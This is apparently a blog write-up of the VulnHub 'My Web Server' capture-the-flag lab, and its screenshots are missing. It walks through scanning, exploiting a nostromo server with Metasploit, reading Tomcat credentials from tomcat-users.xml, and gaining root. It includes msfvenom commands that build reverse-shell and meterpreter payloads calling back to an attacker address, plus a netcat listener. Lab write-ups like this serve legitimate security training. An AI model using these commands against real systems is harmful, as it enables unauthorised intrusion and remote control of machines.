VulnHub – My Web Server Walkthrough

Scanning the target with nmap –A –T4 –p- 192.168.1.7 –vv

There are few open ports, i dirbed them but what’s interesting is port 2222:

The link http://192.168.1.7:2222/cgi-bin/printenv gave us a file prinenv where we got some information to take advantage of like that the target is running a nostromo server and we have the port the URI path, (also the host is running tomcat server on port8080), but let it for now:

Searching for nostromo with Searchsploit we got some exploits:

And with the help of Metasploit we can do this: use exploit/multi/http/nostromo_code_exec

Now we already know that the target is running tomcat on port 8080, we need to find the user file where we can find the password of the tomcat server, the directory to the file is /usr/local/tomcat/conf/ and then we view the file tomcat-users.xml where the information there:

We can login with tomcat: @sprot0230sp

After we login we need to create a WAR file to upload it:

msfvenom -p java/shell_reverse_tcp lhost=192.168.1.6 lport=3333 -f war -o shell.war

And i used Metasploit as it’s much stable, but you can use nc –lvp 3333

The user tomcat can run sudo:

Once again we create a shell using msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1234 -f raw -o exploit.jar

And start a new Metasploit session:

Navigate to the root directory and catch the flag:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s